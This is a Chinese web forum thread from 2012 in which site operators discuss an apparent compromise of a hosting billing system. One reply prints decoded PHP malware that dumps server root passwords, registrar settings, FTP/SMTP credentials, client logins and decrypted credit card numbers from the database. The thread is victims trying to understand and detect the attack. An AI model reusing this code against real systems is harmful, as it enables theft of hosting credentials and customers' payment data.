找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
楼主: mapleaf

吓死我了,被阿拉伯大黑阔盯上了!!!

[复制链接]

696

主题

6403

回帖

1万

积分

论坛元老

积分
14928
发表于 2012-5-17 09:03:31 | 显示全部楼层

heyxiu 发表于 2012-5-17 09:49



盗取所有用户信息,包括用户名,IP,密码等。估计已经悲剧了

请问怎么查看是否中招啊?后台没大黑阔的登陆记录。
回复

使用道具 举报

64

主题

504

回帖

1236

积分

金牌会员

积分
1236
发表于 2012-5-17 09:02:00 | 显示全部楼层

-_- 发表于 2012-5-17 10:06



请问怎么查看是否中招啊?后台没大黑阔的登陆记录。

不用登录,估计代码直接运行了,代码解密后是这样的[ol]
  • include('configuration.php');
  • $query = mysql_query("SELECT * FROM tblservers");
  • $text = $text."\r\n######################### HOST ROOTS ###########################\r\n";
  • while ($v = mysql_fetch_array($query)) {
  •         $ipaddress = $v['ipaddress'];
  •         $username = $v['username'];
  •         $type = $v['type'];
  •         $active = $v['active'];
  •         $hostname = $v['hostname'];
  •         $password = decrypt($v['password'], $cc_encryption_hash);
  •         $text = $text."Type $type\r\n";
  •         $text = $text."Active $active\r\n";
  •         $text = $text."Hostname $hostname\r\n";
  •         $text = $text."Ip $ipaddress\r\n";
  •         $text = $text."Username $username\r\n";
  •         $text = $text."Password $password\r\n**************************************\r\n";
  • }
  • $text = $text."\r\n######################### HOST ROOTS ###########################\r\n";
  • $text = $text."\r\n######################### Domain Reseller ###########################\r\n";
  • $query = mysql_query("SELECT * FROM tblregistrars");
  • while ($v = mysql_fetch_array($query)) {
  •         $registrar = $v['registrar'];
  •         $setting = $v['setting'];
  •         $value = decrypt($v['value'], $cc_encryption_hash);
  •         if ($value == "") {
  •                 $value = 0;
  •         }
  •         $password = decrypt($v['password'], $cc_encryption_hash);
  •         $text = $text."$registrar $setting $value\r\n";
  • }
  • $text = $text."\r\n######################### Domain Reseller ###########################\r\n";
  • $text = $text."\r\n######################### FTP +SMTP ###########################\r\n";
  • $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or  setting='FTPBackupPassword' or  setting='FTPBackupDestination' or  setting='SMTPHost' or  setting='SMTPUsername' or setting='SMTPPassword' or  setting='SMTPPort'");
  • while ($v = mysql_fetch_array($query)) {
  •         $value = $v['value'];
  •         if ($value == "") {
  •                 $value = 0;
  •         }
  •         $text = $text.$v['setting']." ".$value."\r\n";
  • }
  • $text = $text."\r\n######################### FTP +SMTP ###########################\r\n";
  • $text = $text."\r\n######################### Client R00ts ###########################\r\n";
  • $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus");
  • while ($v = mysql_fetch_array($query)) {
  •         $text = $text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
  • }
  • $text = $text."\r\n######################### Client R00ts ###########################\r\n";
  • $text = $text."\r\n######################### Client HOST ###########################\r\n";
  • $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");
  • while ($v = mysql_fetch_array($query)) {
  •         if (($v['username']) and($v['password'])) {
  •                 $text = $text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
  •         }
  • }
  • $text = $text."\r\n######################### Client HOST ###########################\r\n";
  • $text = $text."\r\n######################### Client CC ###########################\r\n";
  • $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype  '' order by issuenumber desc");
  • while ($v = mysql_fetch_array($query)) {
  •         $cchash = md5($cc_encryption_hash.$v['0']);
  •         $s = mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate  FROM `tblclients` where id='".$v['0']."'");
  •         $v2 = mysql_fetch_array($s);
  •         $text = $text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4];
  • }
  • $text = $text."\r\n######################### Client CC ###########################\r\n";
  • echo($text);[/ol]复制代码
  • 回复

    使用道具 举报

    28

    主题

    260

    回帖

    612

    积分

    高级会员

    积分
    612
    发表于 2012-5-17 09:02:48 | 显示全部楼层
    虽然不明白楼主说的是什么 ,但是看起来很牛B的样子
    回复

    使用道具 举报

    32

    主题

    186

    回帖

    494

    积分

    中级会员

    积分
    494
    发表于 2012-5-17 10:01:04 | 显示全部楼层
    这个屌丝谁啊··
    回复

    使用道具 举报

    98

    主题

    925

    回帖

    2196

    积分

    金牌会员

    积分
    2196
    发表于 2012-5-17 10:06:13 | 显示全部楼层

    heyxiu 发表于 2012-5-17 10:52



    不用登录,估计代码直接运行了,代码解密后是这样的

    请问这是用什么工具解密的?我 用在线解密有一些乱码。

    我自己试了一下在后台提交服务单,没发现什么异常。
    回复

    使用道具 举报

    64

    主题

    504

    回帖

    1236

    积分

    金牌会员

    积分
    1236
    发表于 2012-5-17 09:49:00 | 显示全部楼层

    -_- 发表于 2012-5-17 10:55



    请问这是用什么工具解密的?我 用在线解密有一些乱码。

    我自己试了一下在后台提交服务单,没发现什么异 ...

    随便找一个base64 解一下就可以了,http://www.webhostingtalk.com/showthread.php?t=1107228
    回复

    使用道具 举报

    28

    主题

    260

    回帖

    612

    积分

    高级会员

    积分
    612
    发表于 2012-5-17 10:52:02 | 显示全部楼层

    -_- 发表于 2012-5-17 10:55



    请问这是用什么工具解密的?我 用在线解密有一些乱码。

    我自己试了一下在后台提交服务单,没发现什么异 ...




    肯定不会让你很容易发现的。。。
    回复

    使用道具 举报

    199

    主题

    2069

    回帖

    4757

    积分

    论坛元老

    积分
    4757
    发表于 2012-5-17 10:06:00 | 显示全部楼层
    都是乱码啊。。楼主能翻译出来吗??

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|Discuz! X

    GMT+8, 2025-1-11 17:53 , Processed in 0.022323 second(s), 4 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表